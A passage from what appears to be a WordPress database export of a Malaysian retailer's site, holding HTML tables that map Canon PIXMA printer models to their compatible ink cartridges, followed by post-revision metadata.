Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA MG7570</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP160</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP170</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP180</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP228</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP237</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP245</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP258</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP276</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:05:30','2019-09-25 02:05:30','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3329,1,'2019-09-25 10:07:23','2019-09-25 02:07:23','<h2>Injet Printers 